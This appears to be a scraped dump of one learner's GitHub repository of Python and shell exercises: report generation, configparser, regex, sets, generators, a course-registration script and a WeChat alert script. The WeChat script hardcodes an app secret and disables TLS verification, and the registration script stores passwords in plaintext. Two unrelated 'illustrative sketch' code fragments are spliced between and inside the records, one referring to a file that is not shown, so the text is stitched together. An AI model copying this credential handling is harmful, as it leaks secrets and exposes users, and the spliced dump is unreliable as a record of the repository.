rb.write(value.encode(\"utf-8\"))\n#\n#\n#\n# def markdown2html():\n# SOURCE_FILES_PATH = os.path.join(\"/Users/admin/Documents/work/shells/\", \"rb.md\")\n# SOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n#\n# for pos in range(0, len(SOURCE_FILES)):\n# file_base_name = os.path.basename(SOURCE_FILES[pos])\n# file_name = file_base_name.replace(\".md\", \"\")\n# output_files_path = os.path.join(\"/Users/admin/Documents/work/shells/\", file_name + \".html\")\n#\n# markdown.markdownFromFile(\n# input=SOURCE_FILES[pos],\n# output=output_files_path,\n# encoding=\"utf-8\",\n# extensions=[\n# 'markdown.extensions.fenced_code',\n# 'markdown.extensions.tables'\n# ],\n# output_format=\"html5\"\n# )\n\n\nexcel_path = \"/Users/admin/Documents/work/日报-周报/\"\nMD_PATH=\"/Users/admin/Documents/work/shells/\"\nmd_name = \"rb.md\"\ncss = \"\"\"\n<style type=\"text/css\">\ntable,th,td { border:1px solid blue; }\nth { background-color:#98bf21; color:white; }\n#td { background-color:#98bf21; color:white; }\n</style>\"\"\"\n\ndef create_md():\n DT = dt.date.today().strftime('%Y-%m-%d')\n file_name = excel_path + \"运维日报(\" + DT + \"-贾文龙).xlsx\"\n md_file = MD_PATH + md_name\n if not os.path.isfile(file_name):\n print \"没有 \" + file_name + \" 这个文件!!\\n请检查!!!\"\n exit()\n rb = open(md_file, 'w')\n book = xlrd.open_workbook(file_name)\n sh = book.sheet_by_index(0)\n rb.write(css)\n for hang in range(0, sh.nrows):\n if hang == 0 or hang == 1:\n continue\n for lie in range(0, sh.ncols):\n if sh.cell_value(rowx=hang, colx=lie):\n value = sh.cell_value(hang, lie)\n else:\n value = \"-\"\n if lie == 5:\n rb.write(\"|\" + '\\n')\n if hang == 2 and lie == 5: rb.write(\"|--|--|--|--|--|\" + '\\n')\n else:\n rb.write(\"|\")\n rb.write(value.encode(\"utf-8\"))\n rb.closed\n\n\ndef markdown2html():\n 
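# --- Illustrative sketch: teacher.py above gets the digital root by nesting
# digitalSum four times; the digital root also has a closed form via the
# mod-9 congruence, and hailstone can be written iteratively. Function names
# here are invented.
def digital_root(n):
    # for n > 0 the digital root equals 1 + (n - 1) % 9; the root of 0 is 0
    return 0 if n == 0 else 1 + (n - 1) % 9


def hailstone_steps(n):
    steps = 0
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        steps += 1
    return steps


print(digital_root(19))     # 1, matching digitalRoot(19)
print(hailstone_steps(15))  # 17 steps, the same run hailstone(15) prints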
SOURCE_FILES_PATH = os.path.join(MD_PATH, \"*.md\")\n SOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n for pos in range(0, len(SOURCE_FILES)):\n file_base_name = os.path.basename(SOURCE_FILES[pos])\n file_name = file_base_name.replace(\".md\", \"\")\n output_files_path = os.path.join(MD_PATH, file_name + \".html\")\n markdown.markdownFromFile(\n input=SOURCE_FILES[pos],\n output=output_files_path,\n encoding=\"utf-8\",\n extensions=[\n 'markdown.extensions.fenced_code',\n 'markdown.extensions.tables'\n ],\n output_format=\"html5\"\n )\n\nif __name__ == \"__main__\":\n create_md()\n markdown2html()\n" }, { "alpha_fraction": 0.6079136729240417, "alphanum_fraction": 0.6312949657440186, "avg_line_length": 21.849315643310547, "blob_id": "0b85ba038228785ab4ea19bbbedfedcd4c32ecfa", "content_id": "b6a99158ee6cd88258c47ac8163780847605073a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1864, "license_type": "no_license", "max_line_length": 72, "num_lines": 73, "path": "/python学习/模块/配置模块_configParser.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-09\n\n__author__ = '@jia wen long'\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n\n# 配置DEFAULT模块\nconfig[\"DEFAULT\"] = {\n 'ServerAliveInterval': '45',\n 'Compression': 'yes',\n 'CompressionLevel': '9'\n}\n\n# 给 DEFAULT 添加一个配置\nconfig['DEFAULT']['ForwardX11'] = 'yes'\n\n# 也可以这样写\nconfig['www.myconfigParser.com'] = {}\ntopsecret = config['www.myconfigParser.com']\ntopsecret['Port'] = '10086'\ntopsecret['ForwardX11'] = 'yes'\n\n# 写入到文件\nwith open('example.ini', 'w') as configfile:\n config.write(configfile)\n\n\n\n\n# import ConfigParser # python2\n#\n# config = ConfigParser.ConfigParser() # 创建配置文件对象,即配置文件文件描述符\n#\n# # python2 的写法\n# fp = 'example.ini'\n# config.read(fp) # 打开conf\n#\n# # config.add_section('Section1') #添加conf节点\n# # config.set('Section1', 'name', 'jack') #添加值\n# # config.set('Section1', 'age', '23')\n# # config.set('Section1', 'worker', 'CEO')\n# # config.add_section('Section2') #添加conf节点\n# # config.set('Section2', 'name', 'rose') #添加值\n# # config.set('Section2', 'age', '21')\n# # config.set('Section2', 'worker', 'CCC')\n# # # with open(fp, 'w') as fw: #循环写入\n# # # config.write(fw)\n#\n# # 读取\n# name = config.get('Section1', 'name')\n# age = config.get('Section1', 'age')\n# print(\"name: %s \\nage: %s\" % (name, age))\n\n\n# import os\n# import sys\n\n# base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# print os.path.abspath(__file__)\n# print os.path.dirname(os.path.abspath(__file__))\n# print base_dir\n\n\n# +++++++++\n# import confiParser # python3\n# 以下是 python3 的写法\n# config = configParser.ConfigParser() # 创建配置文件对象,即配置文件文件描述符\n# 可以这样写\n" }, { "alpha_fraction": 0.5410062074661255, "alphanum_fraction": 0.5658167004585266, "avg_line_length": 18.608108520507812, "blob_id": "2fc995baa5c6b940d2b3d87a1457230dc8175d0b", "content_id": "ea0df1fc7a2528ba399a37182a5d2d78bd68d27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "no_license", "max_line_length": 80, "num_lines": 74, "path": "/回文.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-08-25\n\n\ndef s_revers(s):\n if s == s[::-1]:\n return True\n else:\n return False\n\n\ndef list_resvers(s):\n l 
= list(s)\n l.reverse()\n # print(l)\n ns = ''.join(l)\n if s == ns:\n print('yes,True')\n else:\n print('no,False')\n\na = input('请输入字符串> ')\n# print(s_revers(a))\nlist_resvers(a)\n\n# string = 'abcdef'\n#\n#\n# def string_reverse1(string):\n# return string[::-1]\n#\n#\n# def string_reverse2(string):\n# t = list(string)\n# l = len(t)\n# for i, j in zip(range(l - 1, 0, -1), range(l // 2)):\n# t[i], t[j] = t[j], t[i]\n# return \"\".join(t)\n#\n#\n# def string_reverse3(string):\n# if len(string) <= 1:\n# return string\n# return string_reverse3(string[1:]) + string[0]\n#\n#\n# from collections import deque\n#\n#\n# def string_reverse4(string):\n# d = deque()\n# d.extendleft(string)\n# return ''.join(d)\n#\n#\n# def string_reverse5(string):\n# # return ''.join(string[len(string) - i] for i in range(1, len(string)+1))\n# return ''.join(string[i] for i in range(len(string) - 1, -1, -1))\n#\n\n# def reverse(str):\n# alist = list(str)\n# alist.reverse()\n# new_str = ''.join(alist)\n# return new_str\n# print reverse('jb51.net')\n#\n# print(string_reverse1(string))\n# print(string_reverse2(string))\n# print(string_reverse3(string))\n# print(string_reverse4(string))\n# print(string_reverse5(string))\n" }, { "alpha_fraction": 0.42540493607521057, "alphanum_fraction": 0.4893435537815094, "avg_line_length": 17.919355392456055, "blob_id": "6568e68d73aaa1f6b923b01c432153f1cfb14094", "content_id": "10ec951e06504fe838f9b80664cd3a7fd380c30a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 54, "num_lines": 62, "path": "/未定义项目练习/GetBAsic.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef getBASIC():\n loop = []\n while True:\n print(\"请输入参数:\")\n S = input()\n if S.endswith('END'):\n loop.append(S)\n break\n else:\n loop.append(S)\n return loop\n\n\ndef findLine(prog, target):\n for i in range(0, len(prog)):\n if prog[i].startswith(target):\n return i\n\n\ndef execute(prog):\n location = 0\n args = []\n while True:\n if location == len(prog) - 1: return \"success\"\n T = prog[location].split()[0]\n location = findLine(prog, T)\n T = prog[location].split()[-1]\n location = findLine(prog, T)\n args.append('loop')\n if len(args) >= len(prog):\n return \"infinite loop\"\n\n\nprint(execute(getBASIC()))\n# (\"\\n\"\n# \"10 GOTO 21\\n\"\n# \"21 GOTO 37\\n\"\n# \"37 GOTO 21\\n\"\n# \"40 END\\n\"\n# \"\\n\"\n# \"5 GOTO 30\\n\"\n# \"10 GOTO 20\\n\"\n# \"20 GOTO 10\\n\"\n# \"30 GOTO 40\\n\"\n# \"40 END\\n\"\n# \"\\n\"\n# \"10 GOTO 20\\n\"\n# \"20 END\\n\"\n# \"\\n\"\n# \"4 GOTO 12\\n\"\n# \"12 GOTO 99\\n\"\n# \"22 GOTO 22\\n\"\n# \"99 GOTO 12\\n\"\n# \"200 END\\n\"\n# \"\\n\"\n# \"10 GOTO 40\\n\"\n# \"20 GOTO 25\\n\"\n# \"25 GOTO 20\\n\"\n# \"40 END\\n\")\n" }, { "alpha_fraction": 0.557073175907135, "alphanum_fraction": 0.5661788582801819, "avg_line_length": 32.434783935546875, "blob_id": "f940fc2fe12850909d3062a990699fb27132d30f", "content_id": "350ab8695f9ee9d7c9e6adc088a587dc77137125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3693, "license_type": "no_license", "max_line_length": 116, "num_lines": 92, "path": "/python学习/面向对象学习/class_作业/bin/student.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-08\n\n__author__ = '@jiawenlong'\n\nimport json\nimport 
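# --- Illustrative sketch: execute() in GetBAsic.py above bounds the run by
# counting jumps against the program length; the halting check can also track
# visited line numbers directly. runs_forever is an invented name.
def runs_forever(prog):
    """prog: lines like '10 GOTO 20', ending with an 'N END' line."""
    table = {line.split()[0]: line for line in prog}
    current, seen = prog[0].split()[0], set()
    while True:
        if current in seen:
            return "infinite loop"   # revisited a line: a GOTO cycle
        seen.add(current)
        line = table[current]
        if line.endswith("END"):
            return "success"
        current = line.split()[-1]   # follow the GOTO target


print(runs_forever(["10 GOTO 21", "21 GOTO 37", "37 GOTO 21", "40 END"]))
print(runs_forever(["10 GOTO 20", "20 END"]))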
os\nimport sys\nsys.path.append('..')\n# Conf_path = sys.path\nfrom lianxi import *\n\nschool_course = {\n 'python': {\n 'period': 14,\n 'price': 2000,\n 'city': '北京'\n },\n 'linux': {\n 'period': 18,\n 'price': 2500,\n 'city': '北京'\n },\n 'go': {\n 'period': 20,\n 'price': 3000,\n 'city': '上海'\n }\n}\n\nprint('欢迎来到 坑死你 学校,这里你可以选择要学习的课程')\nprint('目前我们开设了3门课程,python、linux、go')\nprint('他们分别在 北京和上海开课,详细信息请查询')\n\nwhile True:\n student_course = input('\\n请输入你要学的的课程可以查看详细信息:')\n\n # print(school_course[student_course]['period'])\n if student_course != 'python' and student_course != 'go' and student_course != 'linux':\n print('抱歉,我们学校没有您要查询的课程,请重新选择')\n continue\n # 课程\n course = Course(student_course, school_course[student_course]['period'], school_course[student_course]['price'],\n school_course[student_course]['city'])\n print('以下是 %s 课程的详细信息:\\n学习地址:%s\\n课程名称: %s\\n周期: %s周\\n价格[人民币]: %s' %\n (course.name, course.school, course.name, course.cycle, course.price))\n goon = input('是否继续查询[y/n]:')\n if goon == 'y' or goon == 'Y':\n continue\n else:\n break\n\nregister = input('\\n是否现在注册[y/n]:')\nif register == 'y' or register == 'Y':\n student_name = input('请输入你的名字:')\n student_pwd = input('请输入您的密码:')\n student_phone = input('请输入您的手机号:')\n student_course = input('请输入要学习的课程: ')\n # 学生注册\n course = Course(student_course, school_course[student_course]['period'], school_course[student_course]['price'],\n school_course[student_course]['city'])\n student_one = Student(student_name, student_phone, course)\n print('你的名字是:%s, 手机号: %s \\n\\n你所选的课程的详细信息:\\n学习地址:%s\\n课程名称: %s\\n周期: %s周\\n价格[人民币]: %s'\n % (student_name, student_phone, course.school, course.name, course.cycle, course.price))\n register = input('\\n是否现在付款[y/n]:')\n if register == 'Y' or register == 'y':\n money = int(input('请支付:'))\n ret = student_one.pay(money)\n print('您的付款 %s ,我们已经收到,后续会有专员跟您联系,感谢选择坑死你学校进行培训!' 
% ret)\n # print(School.payment)\n # 信息记录\n # student_info = open(student_name + '.info', 'a')\n json = json.dumps({'name': student_name, 'passwd': student_pwd, 'phone': student_phone,\n 'course': student_course, 'payment': 'yes', 'city': course.school})\n with open(student_name + '.json', 'w') as student_info:\n student_info.write(json)\n else:\n exit()\nelse:\n name = input('请输入登陆名: ')\n pswd = input('请输入密码:')\n if os.path.exists(name + '.json'):\n with open(name + '.json', 'r') as f:\n student = json.load(f)\n # print(student)\n if name == student['name'] and pswd == student['passwd']:\n print('\\n您选的课程是: %s\\n地址在: %s\\n是否付款:%s' % (student['course'], student['city'], student['payment']))\n exit()\n else:\n print('\\n用户名密码错误')" }, { "alpha_fraction": 0.6152178049087524, "alphanum_fraction": 0.6260595321655273, "avg_line_length": 33.283782958984375, "blob_id": "8f351fbbe3c0e677d24d028932427156b87cef99", "content_id": "97a2787960065661524ab7ba810985f39fa96d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5853, "license_type": "no_license", "max_line_length": 136, "num_lines": 148, "path": "/未定义项目练习/weixin.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n# author: yangrong\n# date: 2015-8-19\n# 本微信报警脚本应用于企业订阅号\n# 当用户主动发消息给公众号的时候(包括发送信息、点击自定义菜单、订阅事件、扫描二维\n# 码事件、支付成功事件、用户维权),微信将会把消息数据推送给开发者,开发者在一段时\n# 间内(目前修改为48小时)可以调用客服消息接口,通过POST一个JSON数据包来发送\n# 消息给普通用户,在48小时内不限制发送次数。\n\n\n\nimport os\nimport urllib2\nimport requests\nimport sys\nimport time\nimport json\nimport pickle\n\nappid = 'wx74fa57ee83c7338e'\nsecret = 'a31623dfc4c7408fc832f8073c0f6324'\ntoken_file = '/tmp/token_file.txt'\nlog_file = '/tmp/wechat.log'\nopenid_user_file = '/tmp/openid_user.txt'\nopenid_list = [\"oQe1a0mz0fbLZwfYhPhZ0t4H3S6w\" # jwl\n ] # 这是微信接收者的openid\n\n# 报警格式,脚本名 收件人 标题 内容\n# 这是zabbix发送内容格式,所以\n# 这里取出标题和内容就行了\n\n# 帮助信息,要求必须传参4个\nif len(sys.argv) != 4:\n print 'Usage: %s mail-to title content' % sys.argv[0]\n print 'Example: '\n print ' %s [email protected] \"this is testtitle\" \"this is test content.\"' % sys.argv[0]\n sys.exit()\n\ntitle = sys.argv[2]\ncontent = sys.argv[3]\ncurrent_hour = time.strftime('%H', time.localtime(time.time()))\n\n\n# 日志记录函数,把标题,用户id,状态记录\ndef log(title, openid, status):\n with open(log_file, 'ab') as f:\n current_time = time.strftime('%Y-%m-%d%H:%M:%S', time.localtime(time.time()))\n f.write('%s| %s | %s | %s\\n' % (current_time, openid, status, title))\n\n\n# 获取token\nclass Token(object):\n def __init__(self, appid, secret):\n self.baseurl = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}'.format(appid, secret)\n self.expire_time = sys.maxint\n\n def get_token(self):\n if self.expire_time > time.time():\n request = urllib2.Request(self.baseurl)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n ret = json.loads(ret)\n if 'errcode' in ret.keys():\n print >> ret['errmsg'], sys.stderr\n sys.exit(1)\n self.expire_time = time.time() + ret['expires_in']\n self.access_token = ret['access_token']\n token_pre = [current_hour, self.access_token]\n with open(token_file, 'wb') as f:\n pickle.dump(token_pre, f)\n return self.access_token\n\n\n# access_token = Token(appid=appid,secret=secret).get_token() #这是获取access_token的代码\n# print access_token\n\n\n# 获取所有的openid,然后根据openid获取用户信息,提取出用户名,最后输出用户名与openid的对应关系。\nclass get_user():\n def __init__(self):\n self.access_token = Token(appid, secret).get_token()\n\n\n 
def get_openid_list(self):\n openid_list_url = 'https://api.weixin.qq.com/cgi-bin/user/get?access_token={0}&next_openid='.format(self.access_token)\n request = urllib2.Request(openid_list_url)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n openid_list = json.loads(ret)\n # printopenid_list['data']['openid']\n openid_list = openid_list['data']['openid']\n for openid in openid_list:\n user_info_url = 'https://api.weixin.qq.com/cgi-bin/user/info?access_token={0}&openid={1}'.format(self.access_token, openid)\n user_info_request = urllib2.Request(user_info_url)\n user_info_response = urllib2.urlopen(user_info_request).read().strip()\n user_info = json.loads(user_info_response)\n if 'errcode' in user_info.keys():\n print>> user_info['errmsg'], sys.stderr\n sys.exit()\n with open(openid_user_file, 'wb') as f:\n f.write('openid:%s nickname:%s' % (openid, user_info['nickname']))\n\n\n# 使用post方式发送报警\ndef send_msg(title, content):\n # 一天能够获取的access_token次数是2000次,每次取到的token有效时间2小时,所以pickle dump时,把当前小时数与access_token写入文件,每一小时获取一次token.\n current_hour = time.strftime('%H', time.localtime(time.time()))\n if not os.path.exists(token_file):\n access_token = Token(appid, secret).get_token()\n with open(token_file, 'rb') as f:\n token_pre = pickle.load(f)\n # print'token_pre:',token_pre\n access_token_pre = token_pre[1]\n current_hour_pre = token_pre[0]\n if current_hour == current_hour_pre:\n access_token = access_token_pre\n else:\n access_token = Token(appid, secret).get_token()\n # print'access_token:',access_token\n # 循环openid_list,给每个成员单独推送微信消息\n for openid in openid_list:\n # print'openid:',openid\n url = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=%s' % access_token\n payload = {\n \"touser\": '%s' % openid,\n \"msgtype\": \"text\",\n \"text\": {\n \"content\": \"Title: %s\\nContent:%s\" % (title, content)\n }\n }\n ret = requests.post(url, data=json.dumps(payload, ensure_ascii=False), verify=False)\n result = ret.json()\n\n # printresult\n # 如果这一次发送失败,则代表可能access_token有问题,删除pickle dump文件,重新生成一次access_token\n if result['errcode']:\n log(title, openid, 'sendfail')\n os.remove(token_file)\n access_token = Token(appid, secret).get_token()\n else:\n log(title, openid, 'sendsuccess')\n\n # printpost(url, data)\n\n# get_user().get_openid_list() #这是遍历所有openid,获取openid和用户名的对应关系。\n\nsend_msg(title, content) # 发送微信信息" }, { "alpha_fraction": 0.6293103694915771, "alphanum_fraction": 0.6508620977401733, "avg_line_length": 14.399999618530273, "blob_id": "6887cdd653a2fda5f0e3e92d76a35a9d73539f05", "content_id": "cb3a11dc85ef6088ed8ef2adbdbebd4debee57c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 15, "path": "/git_push.sh", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n[ $# -ne 1 ] && echo \"Usage : sh $0 message \" && exit\nmessage=$1\necho \"添加文件到本地仓库\"\ngit add .\nsleep 2\n\necho \"提交文件到本地仓库\"\ngit commit -m \"$message\" &>/dev/null\nsleep 2\n\necho \"提交文件到远程仓库,github\"\ngit push origin master\n\n" }, { "alpha_fraction": 0.5550122261047363, "alphanum_fraction": 0.6202118992805481, "avg_line_length": 27.546510696411133, "blob_id": "c3ae868e3181e255860521f7083d6dbbecc823a2", "content_id": "a04a87745de44aab4e695713a19e31530133bd80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2992, "license_type": "no_license", "max_line_length": 
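# --- Illustrative sketch: weixin.py above caches access_token by pickling the
# current hour next to the token; the same idea is often written as an expiry
# stamp. fetch_token here is a stand-in, not the real WeChat API call.
import time

_cache = {"token": None, "expires_at": 0.0}


def fetch_token():
    return "token-%d" % int(time.time())  # placeholder, not the WeChat API


def get_token():
    if time.time() >= _cache["expires_at"]:
        _cache["token"] = fetch_token()
        _cache["expires_at"] = time.time() + 7200  # tokens last about 2h
    return _cache["token"]


print(get_token())  # refreshed on the first call
print(get_token())  # served from the cache afterwards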
102, "num_lines": 86, "path": "/python学习/模块/re_正则模块.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/11/4 21:05\n\n__author__ = 'JiaWenLong'\n\nimport re\n\n# findall 取出全部匹配到的字符\n# findall 第一个参数是规则,第二个参数是匹配的字符串。2个参数都必须是字符串\nprint(re.findall('w*', 'hell world'))\nprint(re.findall('a[a,d ,c]', 'ad x'))\nprint(re.findall('[^4,5]', 'iu124i5,'))\nprint(re.findall('[^45]', 'iu124i5,'))\nprint(re.findall('u.n', r'iu\\n124i5,'))\nprint(re.findall('u.n', 'iu\\n124i5,'))\n\nprint('反斜杠的意义')\n# \\d 匹配是兼职数字,任意一个\n# \\D 匹配任意非数字\n# \\s 匹配任意空白字符\n# \\S 匹配任意非空白字符\n# \\w 匹配任意字母数字字符\n# \\W 匹配任意非字母数字字符\n# \\b 匹配一个单词边界,即单词和空格的位置\nprint(re.findall('\\d', 'iu124i5,'))\nprint(re.findall('\\d{2}', 'iu124i567,'))\nprint(re.findall('\\d{2,3}', 'iu124i567,'))\nprint(re.findall('\\D', 'iu12\\s4i\\n5$67,'))\nprint(re.findall('\\s', 'iu 12%4i\\t5$67,'))\nprint(re.findall('\\S', 'iu 12 4i \\t567,'))\nprint(re.findall('w\\w{2}l', 'hell wo0ld'))\nprint(re.findall('\\W', 'hell w$o0%l\\d!@#$&*(\\p'))\nprint(re.findall(r'l\\b', 'hell&wo0l$d'))\n\n####################\nprint('re.search 匹配到第一个后结束')\nprint(re.search('[1-9]+', 'iu123abcheloword1234').group())\nprint(re.search(r\"\\\\p\", 'iu123abcheloword1234\\p').group())\nprint(re.search(\"\\.\", 'iu123abcheloword.123.4\\p').group())\n\nprint('反斜杠的转译')\nprint(re.findall(\"\\\\\\\\\", \"abc\\ed\"))\nprint(re.findall(r\"\\\\\", \"abc\\ed\"))\nprint(re.findall(r\"\\bbelo\", \"belo\"))\nprint(re.findall(\"\\\\bbelo\", \"belo\"))\n\n# 分组 + [1,OO)| ? [0,1]\nprint('分组')\nprint(re.search('(as)+', 'adasfdks').group())\nprint(re.findall('(as)?', 'adafaadksa'))\nprint(re.findall('(as)+', 'adafaasdkasa'))\n\n# 通过组名取字段 格式 (?P<组名>正则)\nret = re.search('(?P<id>\\d{3})/(?P<name>\\w{3})', 'wer34ttt098/ooo')\nprint(ret.group())\nprint(ret.group('id'))\nprint(ret.group('name'))\n\nprint('match 只在字符串开始匹配,返回开头的第一个匹配到的对象')\nprint(re.match('asd', 'adfgasd'))\nprint(re.match('asd', 'asdfgasd').group())\n\n# 中括号中所有字符都是或者关系\nprint('字符分割 split, 第一个参数是分割关键字,第二个为被分割的字符串')\nprint(re.split('[@:]', '3@15:09:35'))\nprint(re.split('[\\.3@]', '3@15:09:35.789'))\nprint(re.split('[ks]', 'lsk,-salk'))\nprint(re.split('[k,s]', 'lsk,-salk'))\n\n\n# sub 替换 第一参数是 正则匹配,第二个是要替换的字符串,第三个是被替换的字符串\nprint('sub 匹配替换,类似sed')\nprint(re.sub('a..x', 'sxxxb', 'hfjasalexxdhf'))\n\n# 编译\nprint('compile 编译匹配')\nprint(re.compile('\\.com'))\nobj = re.compile('\\.com')\nprint(obj.findall('sdjfsldfj.comwoehrow'))\nprint(obj.split('sdfg.comwertyu'))\nprint(obj.sub('.cn', 'www.baidu.com'))\n\ntest = re.compile('\\([^()]+\\)')\nprint(test.findall('1 - 2 * ((60-30 + (-40/5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2))'))" }, { "alpha_fraction": 0.5336374044418335, "alphanum_fraction": 0.5598631501197815, "avg_line_length": 18.488889694213867, "blob_id": "e2326a56fde2d18b47c062c3bc711c7538b63ff9", "content_id": "d4138051f5b31253b5d64c6b04cfd5b62cf92bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 56, "num_lines": 45, "path": "/python学习/函数/集合set.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/8 21:32\n\n\n\n\n# print(set('alex') == set('alexexex'))\n# print(set(\"alex\") < set('alexw'))\n\n\n# print('Set And: ', set('alex') and set('alexw'))\n# print('Set Or', set('alex') or set('alexw'))\n\n\n# a = 
set([1, 2, 3, 4, 5])\na = set([4, 5])\nb = set([4, 5, 6, 7, 8])\n\nprint('集合a:', a)\nprint('集合b: ', b)\n\nprint('交集', a.intersection(b))\nprint('交集&', a & b)\n\nprint('并集', a.union(b))\nprint('并集|', a | b)\n\nprint('差集a-b', a.difference(b))\nprint('差集a-b', a - b)\n\nprint('差集b-a', b.difference(a))\nprint('差集b-a', b - a)\n\nprint('对称差集', a.symmetric_difference(b)) # 除了相同的,其他的取出来\nprint('对称差集^', a ^ b)\n\nprint('对称差集', b.symmetric_difference(a)) # 除了相同的,其他的取出来\nprint('对称差集^', b ^ a)\n\nprint('子集', a.issubset(b)) # a 是否是 b 的子集\nprint('子集 <', a < b)\nprint('超集/父集', a.issuperset(b)) # a 是否完成包含 b\nprint('超集/父集>', a > b)\n" }, { "alpha_fraction": 0.5011494159698486, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 15.11111068725586, "blob_id": "4575ea64daf5c9a76b4bd09e5ee7f87f106ba976", "content_id": "244278b34f6c8d23d3b8fa80165274d7613829c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 449, "license_type": "no_license", "max_line_length": 59, "num_lines": 27, "path": "/python学习/函数/生成器.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-22\n\n__author__ = '@jiawenlong'\n\n\ndef fib(fmax):\n n, before, after = 0, 0, 1\n\n while n < fmax:\n\n # print(before)\n # 生成器 标志 yield\n name = yield before\n\n print(\"My name is %s ! What is your name ?\" % name)\n\n before, after = after, before + after\n\n n = n + 1\n\n\ng = fib(6)\nprint(next(g))\ng.send(\"jiawenlong\")\n" }, { "alpha_fraction": 0.6283783912658691, "alphanum_fraction": 0.633783757686615, "avg_line_length": 27.384614944458008, "blob_id": "21baa58008e10cf53192d0fa976f7086dff6ece3", "content_id": "8ecd596b1ee35d99b58c7e4b59d0e2a97af0e6ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 96, "num_lines": 26, "path": "/未定义项目练习/markdown2html.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport glob\nimport os\nimport markdown\n\n\nSOURCE_FILES_PATH = os.path.join(\"/Users/admin/Documents/work/shells/\", \"test.md\")\nSOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n\nfor pos in range(0, len(SOURCE_FILES)):\n file_base_name = os.path.basename(SOURCE_FILES[pos])\n file_name = file_base_name.replace(\".md\", \"\")\n output_files_path = os.path.join(\"/Users/admin/Documents/work/shells/\", file_name + \".html\")\n\n markdown.markdownFromFile(\n input=SOURCE_FILES[pos],\n output=output_files_path,\n encoding=\"utf-8\",\n extensions=[\n 'markdown.extensions.fenced_code',\n 'markdown.extensions.tables'\n ],\n output_format=\"html5\"\n )\n\n\n" }, { "alpha_fraction": 0.5306427478790283, "alphanum_fraction": 0.5440956354141235, "avg_line_length": 15.518518447875977, "blob_id": "d8e80ea5f356a10cc4bf56500c07caa810f14417", "content_id": "ad74a216af61b441f65f3f2a03f6e7627327e7f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1618, "license_type": "no_license", "max_line_length": 41, "num_lines": 81, "path": "/python学习/面向对象学习/异常处理.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-30\n\n__author__ = '@jiawenlong'\n\"\"\"\ntry:\n # 代码块\n # i = int('1')\n i = input('请输入序号:')\n int(i)\nexcept IndexError as e:\n print(\"\\nIndexError\", 
e, '\\n')\nexcept ValueError as e:\n print(\"\\nValueError\", e, '\\n')\nexcept Exception as e:\n # 上述代码如果出错,自动执行当前块\n # e 是 Exception的对象,对象中封装错误信息\n print(\"\\nException\", e)\nelse:\n # try 中没有报错执行try,如果有错就执行此处\n print(\"\\nelse\", i, '\\n')\nfinally:\n # 不论上面是否报错,此处都执行\n print('finally', i)\n\n# try:\n# raise Exception('主动触发异常')\n# except Exception as e:\n# print(e)\n\"\"\"\n\n'''\ndef db():\n return False\n\n\ndef index():\n try:\n r = input('>>')\n int(r)\n \n \n resault = db()\n if not resault:\n r = open('log', 'a')\n r.write('连接失败')\n # raise Exception('连接失败')\n except Exception as e:\n str_error = str(e)\n print(str_error)\n\nindex()\n'''\n\n'''\n# 自定义错误\n\nclass OldBoyError(Exception):\n def __init__(self, msg):\n self.message = msg\n\n def __str__(self):\n return self.message\n\n\n# obj = OldBoyError('xxx')\n# print(obj)\n\ntry:\n raise OldBoyError('我错了。。。。')\nexcept OldBoyError as e:\n 